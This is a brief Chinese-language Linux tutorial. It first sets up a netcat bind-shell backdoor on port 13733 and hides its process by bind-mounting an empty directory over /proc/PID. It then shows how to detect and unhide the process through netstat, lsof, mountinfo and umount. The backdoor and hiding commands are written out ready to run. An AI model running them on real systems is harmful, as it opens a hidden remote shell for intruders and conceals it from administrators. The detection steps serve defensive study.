1. 運行后門
nohup nc -l -p 13733 -e /bin/sh&
2.
ps aux |grep ‘/bin/sh’ 查找進程PID
mkdir /tmp/empty
mount –bind /tmp/empty /proc/進程PID
3.
cat /proc/$$/mountinfo 查看隱藏進程
cat /proc/mounts
mount
4. 接觸隱藏
umount /proc/進程PID
入侵檢測之隱藏進程檢測
1。
[ blackarch ~ ]# netstat -tulnp
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:13733 0.0.0.0:* LISTEN –
2.
[ blackarch ~ ]# lsof -i:13733
無結果打印
3.
[ blackarch ~ ]#cat /proc/$$/mountinfo
263 20 0:42 /empty /proc/5644 rw,nosuid,nodev shared:29 – tmpfs tmpfs rw
發現可疑掛在信息。進程PID5644 掛載點/empty
4.
umount /proc/5644 解除進程掛載
5.
[ blackarch ~ ]# ps aux |grep 5644
root 5644 0.0 0.0 2404 1580 pts/13 S+ 11:08 0:00 nc -l -p 13733 -e /bin/sh
root 5926 0.0 0.0 5088 920 pts/2 S+ 11:21 0:00 grep 5644